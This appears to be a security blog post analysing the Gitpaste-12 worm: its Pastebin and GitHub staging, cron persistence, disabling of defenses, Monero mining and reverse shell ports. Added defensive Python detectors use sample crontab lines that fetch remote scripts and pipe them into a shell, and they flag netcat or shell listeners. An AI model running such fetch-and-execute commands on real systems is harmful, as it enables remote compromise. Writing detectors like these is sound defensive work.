May 29, 2023
GITY Worm

Gitpaste-12 is a recently discovered worm that uses GitHub and Pastebin to host its component code and has at least 12 different attack modules, each a distinct way to compromise a system.

The GitHub repository used at the time of discovery was as follows:

https://github[.]com/cnmnmsl-001/-

Gitpaste-12 Core

The first phase of the attack is the initial system compromise. This worm has 12 known attack modules, with more under development. The worm attempts to use known exploits to compromise systems and may also attempt to brute force passwords.

Once it has compromised a system, the malware sets up a cron job that it downloads from Pastebin, which in turn fetches the same script and executes it again every minute. This is presumably one mechanism by which updates to the cron jobs can be pushed to the botnet.

The main shell script uploaded to the victim machine during the attack downloads and executes the other components of Gitpaste-12. First, it downloads and sets up a cron job, which periodically downloads and executes a script from Pastebin:

Next, it downloads the shadu1 script from GitHub (https://raw.githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it.
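The persistence described above (a cron job that runs every minute and pulls a script from Pastebin or raw GitHub, piping it straight into a shell) is easy to spot if you read crontab entries for that pattern. The following detector is an added example written for this post, not code from the original article or from the malware; the crontab lines it scans are constructed for the demonstration, and the host names it treats as staging hosts are taken from the post.

```python
import re

# Hosts the post names as staging locations for the worm's components
# (the cron script came from Pastebin, shadu1 from raw GitHub).
STAGING_HOSTS = ("pastebin.com", "raw.githubusercontent.com")

# Constructed crontab content for the demonstration; not captured from a real host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh
* * * * * curl -s https://pastebin.com/raw/EXAMPLEID | bash
* * * * * wget -q -O- https://raw.githubusercontent.com/EXAMPLEUSER/-/master/shadu1 | sh
@hourly /opt/monitor/collect.py
"""

FETCH_RE = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba|z|da)?sh\b")
URL_RE = re.compile(r"https?://([^/\s]+)")


def parse_crontab(text):
    """Split crontab text into entries of (schedule fields, command)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @hourly, @reboot, ... shorthand schedules
            tag, _, command = line.partition(" ")
            entries.append({"schedule": tag, "fields": [], "command": command})
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        entries.append({"schedule": " ".join(parts[:5]),
                        "fields": parts[:5], "command": parts[5]})
    return entries


def find_suspicious_cron(text):
    """Return entries that look like remote-script persistence, with reasons."""
    findings = []
    for entry in parse_crontab(text):
        cmd = entry["command"]
        reasons = []
        hosts = [m.group(1).lower() for m in URL_RE.finditer(cmd)]
        if any(h.endswith(s) for h in hosts for s in STAGING_HOSTS):
            reasons.append("fetches from a paste/raw-git host")
        if FETCH_RE.search(cmd) and PIPE_TO_SHELL_RE.search(cmd):
            reasons.append("downloads and pipes directly into a shell")
        if entry["fields"] == ["*"] * 5 and FETCH_RE.search(cmd):
            reasons.append("every-minute remote fetch")
        if reasons:
            findings.append({"schedule": entry["schedule"],
                             "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_cron(SAMPLE_CRONTAB):
        print(f["schedule"], f["command"], "->", "; ".join(f["reasons"]))
```

Run it against the output of `crontab -l` for each user and the files under `/etc/cron.d` to cover the same ground on a real host; the two benign jobs in the sample are left alone while both download-and-execute jobs are flagged on all three rules.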

The malware begins by preparing the environment. This means stripping the system of its defenses, including firewall rules, SELinux and AppArmor, as well as common attack-prevention and monitoring software.

The shadu1 script contains comments written in Chinese and provides attackers with multiple commands for disabling different security capabilities.

Another capability is the ability to run a miner for the Monero cryptocurrency.

Worming Spread

The Gitpaste-12 malware also contains a script that launches attacks against other machines in an attempt to replicate and spread. It chooses a random /8 CIDR range to attack and tries every address within that range, as demonstrated by this call:

Another version of the script also opens ports 30004 and 30005 for reverse shell commands:
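Because that variant binds fixed ports for its reverse shell, a listening-socket review is a cheap host check. The triage below is an added example written for this post, not code from the original article; it parses `ss -lntp` style output that is constructed here for the demonstration (the process names, PIDs and the allow-list of expected listeners are hypothetical), flags the two port numbers the post reports, and also flags any listener that is missing from the baseline or that is a plain shell or netcat bound to a socket.

```python
import re

# Ports the post says one variant of the worm opens for reverse shell commands.
GITPASTE_PORTS = {30004, 30005}

# Constructed `ss -lntp` style output for the demonstration; not from a real host.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     127.0.0.1:6379      0.0.0.0:*          users:(("redis-server",pid=944,fd=6))
LISTEN  0       50      0.0.0.0:30004       0.0.0.0:*          users:(("sh",pid=1337,fd=4))
LISTEN  0       50      [::]:30005          [::]:*             users:(("sh",pid=1337,fd=5))
"""

# Listeners an administrator expects on this host (hypothetical baseline).
BASELINE = {("0.0.0.0", 22): "sshd", ("127.0.0.1", 6379): "redis-server"}

# Programs that should not normally own a listening socket on a server.
SHELL_LIKE = {"sh", "bash", "dash", "nc", "ncat", "netcat"}

LINE_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+(?:users:\(\("([^"]+)")?'
)


def parse_listeners(text):
    """Extract (address, port, process) from LISTEN rows of `ss -lntp` output."""
    listeners = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header or non-LISTEN row
        listeners.append({"addr": m.group(1), "port": int(m.group(2)),
                          "process": m.group(3) or "?"})
    return listeners


def triage_listeners(text, baseline=BASELINE):
    """Return listeners that deviate from the baseline or match known indicators."""
    findings = []
    for lst in parse_listeners(text):
        reasons = []
        if lst["port"] in GITPASTE_PORTS:
            reasons.append("port reported for the Gitpaste-12 reverse shell")
        key = (lst["addr"], lst["port"])
        if key not in baseline:
            reasons.append("listener not in baseline")
        elif baseline[key] != lst["process"]:
            reasons.append("unexpected process on a baseline port")
        if lst["process"] in SHELL_LIKE:
            reasons.append("shell or netcat bound to a socket")
        if reasons:
            findings.append({**lst, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_listeners(SAMPLE_SS):
        print(f'{f["addr"]}:{f["port"]} ({f["process"]}) -> {"; ".join(f["reasons"])}')
```

The baseline comparison is what makes this useful beyond the two known ports: a later variant that picks different numbers still shows up as an unexpected listener, and a shell owning a socket is worth a look regardless of port.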

Final thought

No malware is good to have, but worms are particularly annoying. Their ability to spread in an automated fashion can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization.
